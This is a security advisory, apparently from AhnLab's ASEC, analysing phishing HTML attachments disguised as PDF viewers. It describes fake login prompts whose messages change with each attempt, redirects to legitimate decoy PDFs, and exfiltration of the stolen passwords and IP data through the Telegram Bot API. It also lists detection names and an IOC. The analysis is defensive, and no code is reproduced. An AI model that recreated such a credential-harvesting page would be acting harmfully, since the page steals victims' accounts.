AhnLab Security Emergency response Center (ASEC) has recently identified circumstances of multiple phishing script files disguised as PDF document viewer screens being distributed as attachments to emails. A portion of the identified file names are as below, and keywords such as purchase order (PO), order, and receipt were used.
| New order_20230831.html | Salbo_PO_20230823.pdf.html |
| WoonggiOrder-230731.pdf.html | PO_BG20231608-019.html |
| ○○○ Pharma.pdf.html | DH○_BILL_LADING_DOCUMENT_RECEIPT.html |
| _Purchase Order Received from ○○○ Cosmetics_msg (email) | BL_148200078498.html |
| En○○○ Purchase Order.html | Sung○○ BioX_New PO.pdf.html |
As shown in Figure 1 below, a blurred image of the document contents was used as the background. When the attached HTML file is run, a prompt message reading “Log in with your email password to see the document” is displayed. Under the password field, there is a message warning users that using the wrong password may result in losing access to the file. As it was made well to seem like an actual PDF file, users must practice particular caution.
Figure 1. Login prompt screen displayed when the attachment is opened
Seeing from the fact that the message displayed changes according to the number of times the user inputs their password, we can see that the file is comparatively well made to deceive users. The response is different when the login button is clicked without entering anything into the password field and according to the number of times the login button is clicked (1-3 times) after entering a value. When the login button is clicked without entering a value, a message displays reading “Cannot find matching login information”. When the login button is clicked for the first time after entering a value in the password field, the message “Please enter the correct password” is displayed, and “The password you entered is incorrect” is displayed when the button is clicked for the second time.
Figure 2. Different messages shown according to the number of times the password is entered (red text)
A notable point is that when the user attempts to log in three times, they are redirected to a page for downloading a public promotional PDF provided by a Korean ERP company. This is to prevent the user from noticing the file was a phishing file by using a normal PDF that is available to anyone. Not only are there scripts that redirect to the aforementioned website, but there are also scripts that redirect the user to a website containing a normal image file with no malicious features (Figure 4).
Figure 3. A public normal website (normal PDF) showing after the user is redirected
Figure 4. A website showing a decoy image after the user is redirected
Figure 5. HTML code separated according to the number of login attempts
In the above Figure 5, we can see that the script code has different texts to be displayed on screen according to the number of login attempts through #password__empty (when attempting login with an empty password field) / #password__incorrect (One login attempt) / #password__incorrect1 (Two login attempts). There is also a code (red box) that uses the window.location.href parameter to redirect the user to a URL containing a normal PDF file when the click event occurs three times.
Figure 6. The sendTeleMsg function which breaches user information via Telegram
Messages can be sent via Telegram, and Bot Token and Chat ID are needed for this. The sendTeleMsg function is visible in Figure 6. It has features to send the recipient’s email address, the password entered by the user, and the user IP address to a chat room created by the threat actor via Telegram API. Because the IP Object uses an open source (json.geoiplookup.io), not only the IP address but also the ISP information and geographical information including the longitude and latitude can be obtained (Figure 7).
Figure 7. User information queried through geoiplookup.io
The threat actor is thought to be using Telegram for their phishing attacks because of its known strengths of anonymity and encryption logic. Using the API of a normal application is deemed to be an attempt to bypass detection from antivirus products because ordinary domains can be blocked when found to be malicious. There have been cases where the Telegram API was used to breach user accounts from time to time in the past as well. However, the recent cases are characteristic in that elements are being more carefully crafted to deceive users, including the fact that normal, publicly available websites are being used in the code. Users must practice caution to not enter account credentials in attachments in emails from unknown sources.
[File Detection]
Phishing/HTML.SendTelegram.S2342 (2023.08.21.02)
Phishing/HTML.SendTelegram.S2346 (2023.08.30.03)
Phishing/HTML.Generic.SC192009 (2023.09.01.00 and multiple others)
[IOC]
94ebd0b12c95f5072561676985b1dbe5
Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.
Source: https://asec.ahnlab.com/en/56812/